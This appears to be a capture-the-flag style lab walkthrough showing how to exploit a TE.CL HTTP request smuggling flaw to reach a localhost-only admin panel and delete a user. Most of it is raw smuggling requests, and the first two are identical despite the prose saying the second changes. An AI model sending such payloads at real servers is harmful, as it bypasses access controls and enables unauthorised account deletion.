Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability.txt

Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Remember to disable "Update Content-Length" from the topmost row Repeater tab.

Our aim is to access the admin panel and delete carlos. Let's start with a standard smuggling attempt:

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


We get a message that admin is only accessible via localhost, so let's add that:

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


Looks good. Let's delete carlos now:

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0